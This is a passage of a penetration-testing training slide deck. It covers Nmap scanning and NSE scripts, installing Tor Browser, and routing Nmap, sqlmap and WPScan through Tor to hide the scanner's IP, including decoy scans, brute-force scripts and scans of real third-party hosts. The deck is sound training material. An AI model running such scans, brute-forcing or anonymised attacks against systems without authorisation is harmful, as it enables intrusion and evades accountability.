NMAP
Nmap
What is Nmap?
Network MAPper - open-source tool for network
scanning
Nmap is very popular, powerful, free and well
documented utility
Good for IT auditing, asset discovery, security profiling
and penetration testing
www.cybexer.com
2
Nmap
What does NMAP do?
Sends raw IP packets to determine available hosts and
services
Helps to identify security holes
www.cybexer.com
3
Nmap
Brief history of Nmap
✓ September 1997 - 1st release of Nmap
✓ December 1998 - Nmap version 2.00 is publicly
released
✓ July 2007 - Zenmap graphical front-end released
✓ October 2020 - Nmap version 7.90 released
www.cybexer.com
4
Nmap
Full Nmap package contains several additional tools
Zenmap - advanced GUI (Linux, Windows, Mac OS)
Ncat - data transfer, redirection, and debugging tool
Ndiff - scan results comparing utility
Nping - packet generation and response analysis tool
www.cybexer.com
5
Nmap
Build your own Nmap
• download
• compile
• verify
• run
www.cybexer.com
6
Nmap
Download latest release from nmap.org with 'wget'
• cd /opt
• wget https://nmap.org/dist/nmap-7.92.tar.bz2
www.cybexer.com
7
Nmap
To save downloaded file with different filename use
'-O' option
• wget https://nmap.org/dist/nmap-7.92.tar.bz2 -O
/opt/nmap-custom.tar.bz2
www.cybexer.com
8
Nmap
In case if 'wget' is missing on your system, use 'curl'
command to get Nmap source code
• cd /opt
• curl https://nmap.org/dist/nmap-7.92.tar.bz2 -o
nmap-7.92.tar.bz2
www.cybexer.com
9
Nmap
Extract downloaded Nmap archive
• tar -jvxf nmap-7.92.tar.bz2
Keep in mind, that archive will be extracted to current
folder
www.cybexer.com
10
Nmap
Extract archive to different folder
• tar -jvxf nmap-7.92.tar.bz2 -C /tmp/
To make extraction silent, remove 'v' option
www.cybexer.com
11
Nmap
Configure Nmap
• cd nmap-7.92/
• ./configure --help
www.cybexer.com
12
Nmap
Configure Nmap
• ./configure --prefix=/opt/nmap
If '--prefix=<path>' is not defined, then default
installation will be done to '/usr/local' folder
www.cybexer.com
13
Nmap
Configure Nmap
Verify output of './configure' command
If some required options needed, but Nmap is not
compiling with their support, then additional libraries
must be installed (apt-get install libssl1.0-dev)
www.cybexer.com
14
Nmap
Clean up from previous './configure' command
• make clean
www.cybexer.com
15
Nmap
After missing libraries are installed, re-run './configure'
command
• ./configure --prefix=/opt/nmap
www.cybexer.com
16
Nmap
Build Nmap
• make
www.cybexer.com
17
Nmap
Verify, that after 'make' command no errors are
displayed (some warnings may occur)
www.cybexer.com
18
Nmap
If 'make' finishes without errors, proceed with
installation of Nmap
• make install
Root privileges are required during "make install"
phase.
www.cybexer.com
19
Nmap
Check output of 'make install' command
If all went well, you should see the following text
"NMAP SUCCEFFULLY INSTALLED"
www.cybexer.com
20
Nmap
Verify newly installed Nmap
• /opt/nmap/bin/nmap -V
www.cybexer.com
21
Nmap
Since Nmap installed in new/custom location, $PATH
environment should be adjusted
• echo $PATH
www.cybexer.com
22
Nmap
Since Nmap installed in new/custom location, $PATH
environment should be adjusted
• export PATH=/opt/nmap/bin:$PATH
• echo $PATH
www.cybexer.com
23
Nmap
Let's start scanning
www.cybexer.com
24
Nmap
Running Nmap without any arguments will show basic
usage options
• nmap
www.cybexer.com
25
Nmap
Basic scanning with Nmap
Everything on the Nmap command-line that isn't an
option (or option argument) is treated as a target host
specification
Scan single IP address
• nmap 127.0.0.1
www.cybexer.com
26
Nmap
Basic scanning
Scan multiple targets
• nmap 127.0.0.1 10.21.32.5
Note! Change 2nd and 3rd octets to correct ones!
www.cybexer.com
27
Nmap
Basic scanning
Scan targets with CIDR-style addressing
• nmap 10.XX.32.5/24
"/24" CIDR notation will scan 256 hosts starting from
10.XX.32.0 and ending with 10.XX.32.255
www.cybexer.com
28
Nmap
Basic scanning
Scan range of targets
• nmap 10.XX.32.100-105
www.cybexer.com
29
Nmap
Basic scanning
Ranges can be specified for any network octets
• nmap 192.168.113-114,205.100-102,177
This target range will scan following hosts
192.168.113.100, 192.168.113.101, 192.168.113.102,
192.168.113.177, 192.168.114.100, 192.168.114.101,
192.168.114.102, 192.168.114.177, 192.168.205.100,
192.168.205.101, 192.168.205.102 and
192.168.205.177
www.cybexer.com
30
Nmap
Basic scanning
List Scan (-sL) - only shows list of targets without
performing any scans. Ideal to generate host lists
• nmap -sL 192.168.113-114,205.100-102,177
www.cybexer.com
31
Nmap
Basic Scanning
Scan targets specified in the file. Target entries may be
any of the formats accepted by Nmap on command line
(IP address, hostname, CIDR, IPv6 etc)
Each entry must be separated by one or more spaces,
tabs, or newlines
www.cybexer.com
32
Nmap
Basic Scanning
Sample content of the target list file
www.cybexer.com
33
Nmap
Basic Scanning
Scan target list from the file
• nmap -iL hosts.txt
www.cybexer.com
34
Nmap
Basic Scanning
Excluding targets from the scan
• nmap --exclude 10.10.10.11 10.10.10.0/28
Multiple exclude targets are allowed (must be commaseparated)
--exclude 10.10.10.11,editor.cnn.com,10.11.12.90/30
www.cybexer.com
35
Nmap
Basic Scanning
Excluding targets using a list file
• nmap --excludefile excluded.txt 10.10.10.0/24
'excluded.txt' must contain IP address/es, hostname/s
or CIDR's of excluded targets
Each entry must be separated by one or more spaces,
tabs, or newlines
www.cybexer.com
36
Nmap
Basic Scanning
Scan IPv6 targets
• nmap -6 fd03:c01:XX:32::2
To scan IPv6 address, both, source and target hosts
must be configured for IPv6
www.cybexer.com
37
Nmap
Basic Scanning
Scanning of IPv6 targets supports same options as IPv4
targets:
--exclude
--excludefile
www.cybexer.com
38
Nmap
Basic Scanning
Do not run DNS lookups for scanned targets
• nmap -n srv.studentXX.csirt.crp
Since DNS resolving can be slow, using '-n' may speedup scanning time
www.cybexer.com
39
Nmap
Basic Scanning
Use custom DNS servers for DNS resolution
• nmap --dns-servers 10.103.176.2 files.csirt.crp
Note! Check your DNS server IP from /etc/resolv.conf
www.cybexer.com
40
Nmap
Basic Scanning
By default, Nmap scans only first IP address of resolved
hostname. For example, running "nmap cnn.com" will
scan only first resolved IP address - 151.101.65.67
To can all IP addresses, use '-R' option
• nmap -R cnn.com
www.cybexer.com
41
Nmap
Basic Scanning
By default (without any port options), Nmap scans
1000 default ports for each protocol.
To scan specific port, use '-p <port_number>'
• nmap -p 80 files.csirt.crp
www.cybexer.com
42
Nmap
Basic Scanning
Different ports can be comma-separated
• nmap -p 80,443,8080 files.csirt.crp
Or port ranges can be separated with hyphen
• nmap -p 70-100,200-250,1000-1024 files.csirt.crp
www.cybexer.com
43
Nmap
Basic Scanning
Excluding port numbers from scanning
• nmap --exclude-ports 22 files.csirt.crp
Multiple ports and port ranges can be also used
• nmap --exclude-ports 22,70-80,443 files.csirt.crp
www.cybexer.com
44
Nmap
Basic Scanning
To scan all port use '-p-' option
• nmap -p- srv.studentXX.csirt.crp
If you forget the maximum number of ports, then you can
always calculate it using the formula: 216 - 1
www.cybexer.com
45
Nmap
Basic Scanning
Specifying particular protocol for particular port
• nmap -sSU -p U:53,111,161,T:21-25,80,139,8080
srv.studentXX.csirt.crp
This scanning option will scan UDP ports 53, 111,and
161. And TCP ports 21 to 25, 80, 139 and 8080.
www.cybexer.com
46
Nmap
Basic Scanning
By default, Nmap scans ports in random order. If
sequential port scanning is needed (e.g., IDS/IPS or
firewall testing), then '-r' option must be specified
• nmap -r -p 100-200 srv.studentXX.csirt.crp
'-r' option sorts ports from lowest to highest
www.cybexer.com
47
Nmap
Basic Scanning
Scan 'most popular' ports on the targets. Number '10'
stands for number of top ports to be scanned
• nmap --top-ports 10 srv.studentXX.csirt.crp
Nmap uses its own database of port popularity
(/usr/share/nmap/nmap-services).
'--top-ports' option is very useful for initial scans and largescale scans.
'--top-ports' option can be combined with '--exclude-ports'
option
www.cybexer.com
48
Nmap
Basic Scanning
Depends on the scan types and options, sometimes it's
reasonable to run fast scan against the targets
'-F' options scans 100 top ports
• nmap -F srv.studentXX.csirt.crp
www.cybexer.com
49
Nmap
Basic Scanning
During default scanning, Nmap will display open,
filtered and closed ports
If you want to display only 'open' ports, then option '-open' should be used
• nmap -sS -Pn -n --open 10.XX.32.5
www.cybexer.com
50
Nmap
Basic Scanning
Definition of port states
'open' - an application on the target machine is
listening for connections/packets on that port
'filtered' - a firewall, filter, or other network obstacle is
blocking the port so that Nmap cannot tell whether it is
open or closed
'closed' - no application listening on them, though they
could open up at any time
www.cybexer.com
51
Nmap
To detect OS (Operating System) of the target, Nmap
uses TCP/IP stack fingerprinting.
Nmap sends a series of TCP and UDP packets to the
remote host and examines practically every bit in the
responses.
After performing dozens of tests such as TCP ISN
sampling, TCP options support and ordering, IP ID
sampling, and the initial window size check, Nmap
compares the results to its nmap-os-db database of
more than 2600 known OS fingerprints and prints out
the OS details if there is a match.
www.cybexer.com
52
Nmap
Detecting OS (Operating System)
• nmap -O srv.studentXX.csirt.crp
www.cybexer.com
53
Nmap
Aggressive scan
• nmap -A srv.studentXX.csirt.crp
www.cybexer.com
54
Nmap
Aggressive scan gives much more information about
scanned targets and running services, comparing to
default scan, but it is also more time consuming.
Aggressive scan tries to detect OS (-O), versions of
detected services (-sV), script scanning (-sC) and
traceroute information.
Aggressive scan also is more intrusive than default
scan, since Nmap runs more checks of the target.
www.cybexer.com
55
Nmap
By default, without any scanning options, Nmap runs
TCP SYN scan. Parameter '-sS' stands for SYN scan
• nmap -sS 127.0.0.1
Note! Syn scan requires 'root' privileges.
www.cybexer.com
56
Nmap
TCP SYN scan is most preferred scanning technique.
It can be performed quickly, scanning thousands of
ports per second on a fast network not hampered by
restrictive firewalls.
It is also relatively unobtrusive and stealthy since it
never completes TCP connections.
www.cybexer.com
57
Nmap
To perform TCP Connect scan use '-sT' option
• nmap -sT 127.0.0.1
Note! TCP Connect scan can be run as unprivileged user
www.cybexer.com
58
Nmap
By default, Nmap scans for TCP services. To check UDP
services running on targets hosts use '-sU' option
• nmap -sU 127.0.0.1
www.cybexer.com
59
Nmap
Since UDP and TCP are completely different protocols,
be careful when scanning large UDP port ranges.
It's highly preferable to run UDP scans against specific,
most used ports or limit number of UDP ports with '-top-ports 10' option
• nmap -sU --top-ports 10 10.XX.32.5
www.cybexer.com
60
Nmap
Nmap allows to combine scanning of TCP and UDP
ports. Options '-sT' and '-sU' must be used. You can add
any other options described above.
• nmap -sT -sU 127.0.0.1
www.cybexer.com
61
Nmap
For different purposes Nmap allows to set fine-grained
timing controls. Timing options are defined with '-T'
flag followed by numbers from 0 to 5
-T0 - paranoid mode, 1 probe sent every 5 minutes
-T1 - sneaky mode, 15 seconds between each probe
-T2 - polite mode, 0.4 seconds between each probe
www.cybexer.com
62
Nmap
For different purposes Nmap allows to set fine-grained
timing controls. Timing options are defined with '-T' flag
followed by numbers from 0 to 5
-T3 - normal mode, this is default scanning setting. It runs in
parallel mode
-T4 - aggressive mode, runs with smaller timeouts and
retries
-T5 - insane mode, runs even with smaller timeouts and
retries than '-T4' mode
www.cybexer.com
63
Nmap
Nmap allows to combine scanning of TCP and UDP
ports. Options '-sT' and '-sU' must be used. You can add
any other options described above.
• nmap -sS -T1 -p 22 127.0.0.1
www.cybexer.com
64
Nmap
Compare -T1 and -T2 scanning times
• nmap -sS -T2 -p 22 127.0.0.1
www.cybexer.com
65
Nmap
It is important to save Nmap port scanning results.
There're many good reasons to do that
- stay stealthy (avoid scanning many times)
- compare different Nmap scan results
- share with other team members
- import scan results into other tools and applications
www.cybexer.com
66
Nmap
Nmap scan results have 5 different formats
- interactive output (default stdout/screen output)
- normal output, saves interactive output to the file
- XML output, saves Nmap scan results to the file in
XML format
- grepable output, saves Nmap scan results to the file,
which can be searched and parsed with standard
Linux tools such as grep, awk, sed etc.
- script kiddie output, saves Nmap scan results to the
file written in 'hackers' language
www.cybexer.com
67
Nmap
Save Nmap scan results to the file
• nmap -oN output.txt 10.XX.32.5
After scan, 'output.txt' file with scan results will be
created in current folder
www.cybexer.com
68
Nmap
Save Nmap scan results to the file
• nmap -oG outputg.txt 10.XX.32.5
After scan, 'outputg.txt' file with scan results will be
created in current folder
www.cybexer.com
69
Nmap
Save Nmap scan results to the file
• nmap -oX output.xml 10.XX.32.5
After scan, 'output.xml' file with scan results will be
created in current folder. File format is XML
www.cybexer.com
70
Nmap
Save Nmap scan results to the file
• nmap -oS outputs.txt 10.XX.32.5
After scan, 'outputs.txt' file with scan results will be
created in current folder
www.cybexer.com
71
Nmap
Sometimes there's a need to save Nmap scan results in
different formats. Instead of specifying different '-o'
options, it is possible to save output in all formats
(except script kiddies format)
• nmap -oA scan01 10.XX.32.5
www.cybexer.com
72
Nmap
Option '-oA scan01' means, that after Nmap finishes
scanning, 3 different output files with scanning results
will be created and prefix for the files will be 'scan01'.
.gnmap extension is for 'grepable' file format
.nmap extension is for default file format
.xml extension is for XML file format
• ls -la scan01.*
www.cybexer.com
73
Nmap
XML output is one of the most important output types,
as it can be converted to HTML, easily parsed by
programs such as Nmap graphical user interfaces or
imported into databases or applications.
www.cybexer.com
74
Nmap
Let's convert Nmap XML output file to HTML file
We use xsltproc command, which is command line XSLT
processor
• xsltproc scan01.xml -o
/var/www/html/scan01.html
Start Apache web server on your Kali Linux
• service apache2 start
www.cybexer.com
75
Nmap
Open created HTML page in web browser
http://10.XX.32.2/scan01.html
www.cybexer.com
76
Nmap
By default, during scan Nmap is not showing any
progress. During scan, by pressing 'space' or 'enter'
keys you can see progress of the scan
www.cybexer.com
77
Nmap
To display periodically scanning statistics you can use '-stats-every' options followed by number, which defines
interval of status update
• nmap --stats-every 10s 10.XX.32.2/24
www.cybexer.com
78
Nmap
If you need to identify hosts which are online, but without
actual port scanning, then Nmap can be run in 'ping-sweep'
mode
• nmap -sn 10.XX.32.0/24
Older versions of Nmap has option '-sP'
www.cybexer.com
79
Nmap
Depends on the network setup, firewalls may be blocking
ICMP requests. If it happens, then Nmap will not do port
scan if target is not pingable. To disable 'ping scan', but run
port scan on all targets use '-Pn' options
• nmap -Pn 192.168.113.1
This type of scan helps to avoid firewalls, which block ICMP
probes
Older versions of Nmap use '-P0' options, to disable ping
requests
www.cybexer.com
80
Nmap - NSE scripts
Advanced Nmap usage with NSE scripts
NSE - Nmap scripting engine
NSE offers very powerful and flexible features. It allows
users to write (and share) simple scripts using the Lua
programming language.
NSE scripts allow to automate a wide variety of
networking tasks.
www.cybexer.com
81
Nmap - NSE scripts
To get HTTP title page information
• nmap -n -sS --script http-title --open -p 443
edition.cnn.com
www.cybexer.com
82
Nmap - NSE scripts
Nmap scripts default location is in
'/usr/share/nmap/scripts' folder. There're over 600
different scripts
• ls -la /usr/share/nmap/scripts/
www.cybexer.com
83
Nmap - NSE scripts
Let's review 'http-title' NSE script
• less /usr/share/nmap/scripts/http-title.nse
www.cybexer.com
84
Nmap - NSE scripts
When Nmap runs 'http-title' script, it sends HTTP GET
request to the target server.
Target host and port must be defined.
Response from the server is saved to 'resp' variable
www.cybexer.com
85
Nmap - NSE scripts
If HTTP server responds with HTTP redirect status
codes 30X, then HTTP title will be set to "Did not follow
redirect to ...."
• nmap -n -sS --script http-title --open -p 80
edition.cnn.com
www.cybexer.com
86
Nmap - NSE scripts
If HTTP response does not have HTTP Body content,
then script execution will end
www.cybexer.com
87
Nmap - NSE scripts
If HTTP response does have HTTP Body content, scripts
will be searching for HTML tag '<title>'.
Since '<title>' tag can be written in different cases
(Title, TITLE, tITLE etc.), then Regular Expression is used
If HTTP body matches regular expression, then
everything between '<title>' and '</title>' tags is saved
to variable 'title'
www.cybexer.com
88
Nmap - NSE scripts
If HTML title variable length is over 65 characters, then
rest of 'Title' value is removed and '...' appended
www.cybexer.com
89
Nmap - NSE scripts
Once 'http-title' script finishes its execution, HTTP 'title'
will be returned to Nmap's output (shown in Nmap
scan results)
www.cybexer.com
90
Nmap - NSE scripts
HTTP protocol is one of the most popular protocols in
use today. Nmap has large number of NSE scripts,
which allows to do complex scanning of web servers.
www.cybexer.com
91
Nmap - NSE scripts
Scanning for supported HTTP methods
• nmap -p80 --script http-methods 10.XX.32.5
www.cybexer.com
92
Nmap - NSE scripts
Discover interesting files and folders in web server
• nmap -p80 --script http-enum 10.XX.32.5
www.cybexer.com
93
Nmap - NSE scripts
Let's try some other NSE scripts
'whois-domain' script will query WHOIS server and
display information about scanned domain
• nmap --script whois-domain cnn.com
www.cybexer.com
94
Nmap - NSE scripts
Let's try some other NSE scripts
'smb-enum-shares' script will attempt to list remote
shares on target server.
For many NSE scripts it is advised to narrow down scan
to specific ports. In case of remote shares, we will use
port 445
• nmap -sS -Pn -n -p 445 --script smb-enum-shares
10.XX.32.5
www.cybexer.com
95
Nmap - NSE scripts
Result of remote share scan
www.cybexer.com
96
Nmap - NSE scripts
Let's try some other NSE scripts
Nmap allows to combine several NSE scripts
• nmap --script ssl-cert,ssl-enum-ciphers -p 443
edition.cnn.com
www.cybexer.com
97
Nmap - NSE scripts
In this example 'ssl-cert' NSE script will show
information about SSL/TLS certificate of the target - CN,
Issuer, certificate validity period, SAN records and other
certificate information
'ssl-enum-ciphers' will try to enumerate different
SSL/TLS ciphers and output the information
www.cybexer.com
98
Nmap - NSE scripts
Let's try some other NSE scripts
Some NSE scripts allow to brute-force services for
different usernames and/or passwords
• nmap --script vnc-brute -p 5901 10.XX.32.2
To see fill list of brute-force scripts, run following
command in terminal
• ls -al /usr/share/nmap/scripts/*brute*
www.cybexer.com
99
Nmap - NSE scripts
Nmap allows to combine NSE scripts with same prefix.
For example, there're many scripts with 'http-' prefix:
http-google-malware
http-php-version
http-sql-injection
http-wordpress-users
www.cybexer.com
100
Nmap - NSE scripts
To run all HTTP scripts against the target, use 'http-*'
for script option
• nmap -p80 --script "http-*" 10.XX.32.5
Note! Be careful when using many scripts, it will
generate 'A LOT' of traffic, will run much longer and in
some cases, it can do denial of service for the target
www.cybexer.com
101
Nmap - NSE scripts
NSE scripts has different categories. Some scripts
considered as intrusive, where some scripts are pretty safe
to run against the target systems
Run all nonintrusive scripts
• nmap --script "not intrusive" 10.XX.32.5
Run safe scripts
• nmap --script "safe" 10.XX.32.5
You can make very granular combination of NSE scripts
• nmap --script "(default or safe or intrusive) and not
http-*" 10.XX.32.5
www.cybexer.com
102
Nmap - NSE scripts
Nmap allows to run decoy scan against the targets.
Nmap makes it appear to the remote host that the
host(s) you specify as decoys are scanning the target
network too.
It is generally very effective technique for hiding your IP
address.
• nmap -sS -Pn -n D192.168.1.1,192.168.2.2,10.10.10.10 10.XX.32.5
www.cybexer.com
103
Nmap - NSE scripts
Sometimes you have to compare different scan results,
to see what services and/or hosts appeared or
removed between scans
ndiff - utility to compare the results of Nmap scans
Install 'ndiff' tool on Kali linus
• apt-get install ndiff
www.cybexer.com
104
Nmap - NSE scripts
Ndiff application takes two Nmap XML output files and
prints the differences between them.
The differences observed are
· Host states (e.g. up to down)
· Port states (e.g. open to closed)
· Service versions (from -sV)
· OS matches (from -O)
· Script output
www.cybexer.com
105
Nmap - NSE scripts
Let's compare two Nmap scan results
• ndiff scan1.xml scan2.xml
To see more detailed comparison, use '-v' options
• ndiff -v scan1.xml scan2.xml
www.cybexer.com
106
Tor Browser
Tor Browser - installation
Tor Browser – is a web-browser using the Tor network.
It has some extra features to enhance your anonymity
and privacy.
The Tor network itself is designed to hide your original
IP address. It is also encrypting Internet traffic sending
from and to your computer.
www.cybexer.com
108
Tor Browser - installation
All in all, Tor Browser:
• hides your IP
• does not save any account information (logins and
passwords)
• does not save your web history
• has some extra tools to protect you from reveal
www.cybexer.com
109
Tor Browser - installation
Tor Browser is now present in Kali Linux repository, but
we will go through installation procedure step-by-step.
As with most of the software for Linux, there're several
ways how to download and/or install it.
First way is to visit TOR's official site
'https://www.torproject.org' and download needed
version.
www.cybexer.com
110
Tor Browser - installation
Here's the command, that will download latest version of
Tor Browser archive, extract all files from that archive, then
move extracted content to '/root/tor/' folder and finally
remove downloaded Tor Browser archive
• temp="$(curl -s
https://www.torproject.org/download/languages/)"
&& temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.]+_ALL.tar.xz' | tail -n 1` && wget -O tor-browserlinux64.tar.xz "https://www.torproject.org$temp2" &&
tar xvfJ tor-browser-linux64.tar.xz && rm -f torbrowser-linux64.tar.xz && mv tor-browser*/Browser/
~/tor && rm -rf tor-browser*
www.cybexer.com
111
Tor Browser - installation
Let's take the whole command to pieces and see how it
works and what it does. As you have noticed, there several
places with '&&'
• temp="$(curl -s
https://www.torproject.org/download/languages/)"
&& temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.]+_en-US.tar.xz' | tail -n 1` && wget -O tor-browserlinux64.tar.xz "https://www.torproject.org$temp2" &&
tar xvfJ tor-browser-linux64.tar.xz && rm -f torbrowser-linux64.tar.xz && mv tor-browser*/Browser/
~/tor && rm -rf tor-browser*
www.cybexer.com
112
Tor Browser - installation
Double ampersand (&) in Linux OS separates different commands. The
command after '&&' is executed only if previous command did not
finish with errors. So, we have following 7 commands
1. temp="$(curl -s
https://www.torproject.org/download/languages/)"
2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_enUS.tar.xz' | tail -n 1`
3. wget -O tor-browser-linux64.tar.xz
"https://www.torproject.org$temp2"
4. tar xvfJ tor-browser-linux64.tar.xz
5. rm -f tor-browser-linux64.tar.xz
6. mv tor-browser*/Browser/ ~/tor
7. rm -rf tor-browser*
www.cybexer.com
113
Tor Browser - installation
Let's review all commands one by one.
First command will fetch content from
'https://www.torproject.org/download/languages/'
page using 'curl' program and store result in 'temp'
variable
1. temp="$(curl -s
https://www.torproject.org/download/languages/
)"
www.cybexer.com
114
Tor Browser - installation
Second command will print (echo) content of 'temp'
variable from first command, then will search for alphanumeric text ending with '_en-US.tar.xz' and from that
results only last line will be chosen and set to variable
'temp2'
2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.]+_en-US.tar.xz' | tail -n 1`
www.cybexer.com
115
Tor Browser - installation
Before going further, lets run first and seconds
commands and see what will be the result
• temp="$(curl -s
https://www.torproject.org/download/languages/)
" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z09/_.-]+_en-US.tar.xz' | tail -n 1`
Since output of two commands is set to variable
'temp2', we will not see anything in output. To see
value of 'temp2' variable, type following command
• echo $temp2
www.cybexer.com
116
Tor Browser - installation
From 1st and 2nd commands we have variable 'temp2'.
This variable is used in 3rd command, which will
download Tor Browser and save file as 'tor-browserlinux64.tar.xz'
3. wget -O tor-browser-linux64.tar.xz
"https://www.torproject.org$temp2"
www.cybexer.com
117
Tor Browser - installation
After running first 3 commands, in our current folder
we must have downloaded Tor Browser archive. Let's
check the content of current folder
• ls -la
If you have file 'tor-browser-linux64.tar.xz' in current
folder, then execution of first three commands was
successful.
www.cybexer.com
118
Tor Browser - installation
4th command will extract content of downloaded
archive into current folder
4. tar xvfJ tor-browser-linux64.tar.xz
Note. If you want to minimize screen output during
extraction, then remove 'v' option from command.
www.cybexer.com
119
Tor Browser - installation
5th command will remove downloaded Tor Browser
archive from current folder. '-f' option will not prompt
for file deletion
5. rm -f tor-browser-linux64.tar.xz
www.cybexer.com
120
Tor Browser - installation
6th command will move all content Tor Browser folder
to new location 'tor' in user's home folder
6. mv tor-browser*/Browser/ ~/tor
www.cybexer.com
121
Tor Browser - installation
The final, 7th command will clean-up 'leftovers' from Tor
Browser archive extraction
7. rm -rf tor-browser*
www.cybexer.com
122
Tor Browser - usage
Before using the Tor Browser, it is reasonable to verify
installation location and permissions of files and folder
• ls -la ~/tor/
www.cybexer.com
123
Tor Browser - usage
Latest Tor Browser will not run in 'root' user
permissions. We have to do small adjustments to Tor
launcher file "~/tor/start-tor-browser". Comment out
following code:
Result of changes
www.cybexer.com
124
Tor Browser - usage
Since the Tor Browser is a graphical program, it must be
executed from graphical environment.
Open in VNC viewer 10.XX.32.2:5901
Open Kali Linux terminal and execute following
program
• ~/tor/start-tor-browser
www.cybexer.com
125
Tor Browser - usage
If you see following screen, then click on 'Connect'
button to start using the Tor Browser
www.cybexer.com
126
Tor Browser - usage
If you run the Tor Browser for the first time, then
required configuration will be loaded
www.cybexer.com
127
Tor Browser - usage
To verify, that Tor Browser
is working properly, open
'ipleak.net' site.
If you see not your
external IP address, then
Tor Browser is working
properly.
www.cybexer.com
128
Tor Browser - usage
Congratulations!
By using Kali Linux command line, you have
downloaded latest version of the Tor Browser, extracted
the archive, moved to custom location and cleaned up
files and folder after download.
You have successfully installed Tor Browser.
www.cybexer.com
129
Anonymous scanning through Tor
Anonymity is a very complex problem that not be
solved in a single document. Before starting real action,
you must double-check everything in the laboratory
environment.
In this course, we will learn you how hide your real IP
address while scanning by Nmap, sqlmap or WPScan.
We will use Tor to route Nmap, sqlmap or WPScan
traffic.
www.cybexer.com
130
Anonymous scanning through Tor
Let's install 'Tor' in Kali Linux. In terminal window type
in following command
• apt-get -y install torsocks tor
www.cybexer.com
131
Anonymous scanning through Tor
Main 'Tor' configuration file located here
'/etc/tor/torrc'. For proper anonymity we have to add
new 3 configuration options:
AutomapHostsOnResolve - mapping of unused virtual
addresses
DNSPort - port for DNS UDP requests
TransPort - port for transparent proxy connections
www.cybexer.com
132
Anonymous scanning through Tor
Let's append new options to 'Tor' configuration file
• echo 'AutomapHostsOnResolve 1' >> /etc/tor/torrc
• echo 'DNSPort 53530' >> /etc/tor/torrc
• echo 'TransPort 9040' >> /etc/tor/torrc
www.cybexer.com
133
Anonymous scanning through Tor
Verify configuration changes with 'tail' command. Since
we appended new options at the end of file, we can
print only 10 last lines
• tail -n10 /etc/tor/torrc
www.cybexer.com
134
Anonymous scanning through Tor
Now we have to enable 'Tor' process auto-startup
• systemctl enable tor
And finally, let's start main 'Tor' process
• systemctl start tor
www.cybexer.com
135
Anonymous scanning through Tor
After 'Tor' start-up, it is advised to verify, that 'Tor' is
running. Check 'tor' network connections with 'netstat'
command
• netstat -tulpna |grep tor
www.cybexer.com
136
Anonymous scanning through Tor
Or you can check status of Tor with 'systemctl'
command
• systemctl status tor
www.cybexer.com
137
Anonymous scanning through Tor
Now when we have 'Tor' service running we can check
if it works properly with 'ProxyChains-NG' program.
'ProxyChains-NG' is a software, which redirects
connections through socks/http proxies.
The usage is pretty straightforward - add 'proxychains4'
before desired command, to redirect traffic through the
'Tor' network.
www.cybexer.com
138
Anonymous scanning through Tor
Let's check our external IP address
• curl ipinfo.io
www.cybexer.com
139
Anonymous scanning through Tor
Let's install 'proxychains4' from Kali Linux repository
• apt-get -y install proxychains4
www.cybexer.com
140
Anonymous scanning through Tor
Now, let's check our external IP address through 'Tor'
network
• proxychains4 curl ipinfo.io
www.cybexer.com
141
Anonymous scanning through Tor
As you see, 'Proxychains4' generates a lot of exceeded
information. Try the following construction to suppress the
unnecessary output
• proxychains4 curl ipinfo.io 2>/dev/null
Or use '-q' options
• proxychains4 -q curl ipinfo.io
www.cybexer.com
142
Anonymous scanning through Tor
By default, 'Tor' randomly selects entry node,
intermediate node(s) and exit node.
After each 'Tor' service restart new nodes selected.
To limit 'Tor' exit nodes to specific country, add
following line to configuration file
• echo 'ExitNodes {se}, {nl}, {ch}, {fr}' >>
/etc/tor/torrc
And restart 'Tor' service
• service tor restart
www.cybexer.com
143
Anonymous scanning through Tor
Now, check your external IP address again
• proxychains4 curl ipinfo.io 2>/dev/null
You can test more, by restarting 'Tor' service and
running 'proxychain4' command again
www.cybexer.com
144
Anonymous scanning through Tor
There're might be situations, when you want
completely disable some countries from 'Tor' chain.
To do that, use 'ExcludeNodes' option followed by
country codes, which will be excluded
• echo 'ExcludeNodes {ru}, {by}, {cn}, {ua}' >>
/etc/tor/torrc
After all configuration changes, you must restart 'Tor'
service
www.cybexer.com
145
Anonymous scanning through Tor
For scanning with 'Nmap' through 'Tor' network you
have to be very cautious.
If you run 'Syn-Scan' against the target, your real IP
address will be leaked.
Let's see what will happen when we run 'nmap' with 'sS' option.
www.cybexer.com
146
Anonymous scanning through Tor
Open new Kali Linux terminal and start network packet
capture
• tcpdump -n -i eth0 -s0 host 94.154.144.4 and port
443
www.cybexer.com
147
Anonymous scanning through Tor
On machine where we initiate port scanning, we run
'proxychains4' with 'nmap' and set 'syn-scan' option
• proxychains4 nmap -sS -PN -sV --open -n -p 443
94.154.144.4 2>/dev/null
www.cybexer.com
148
Anonymous scanning through Tor
Now, let's check 'tcpdump' output.
We can clearly see, that our attacking machine's IP
address was revealed
www.cybexer.com
149
Anonymous scanning through Tor
Next, we run 'nmap' with 'connect-scan', by using '-sT'
option
• proxychains4 nmap -sT -PN -sV --open -n -p 443
94.154.144.4 2>/dev/null
www.cybexer.com
150
Anonymous scanning through Tor
Running 'nmap' with '-sT' option did not reveal
attacking machine's external IP address.
www.cybexer.com
151
Anonymous scanning through Tor
If you run 'nmap' through 'proxychains4 against the
hostname, not IP address of target, then you might see
an error 'nmap: netutil.cc:1319: int
collect_dnet_interfaces(const intf_entry*, void*):
Assertion `rc == 0' failed.'
• proxychains4 nmap -sT -PN -sV -v -A -T4 -p 80
cnn.com
www.cybexer.com
152
Anonymous scanning through Tor
To fix that problem, there are two options
- scan IP address, but not hostname
- or comment out 'proxy_dns' option in
'/etc/proxychains4.conf' file
• sed -i 's/^proxy_dns/#proxy_dns/g'
/etc/proxychains4.conf
www.cybexer.com
153
Anonymous scanning through Tor
'sqlmap' anonymous scanning through 'Tor' network.
'sqlmap' has the --proxy option, therefore you just
need to append --proxy socks5://127.0.0.1:9050 to
you command
• sqlmap -u TARGET --proxy socks5://127.0.0.1:9050
www.cybexer.com
154
Anonymous scanning through Tor
'WPScan' anonymous scanning through Tor network.
WPScan has the similar --proxy flag, so just append -proxy socks5://127.0.0.1:9050 to your normal
command
• wpscan -u TARGET -e p,vt,u --proxy
socks5://127.0.0.1:9050
Note. If you have significant delays in scanning, it's
recommended to use --request-timeout 500 --connecttimeout 120 options
www.cybexer.com
155
DIRB, NIKTO, GOBUSTER
DIRB - overview
DIRB is a Web Content Scanner. It looks for existing
(and/or hidden) web objects. It works by launching a
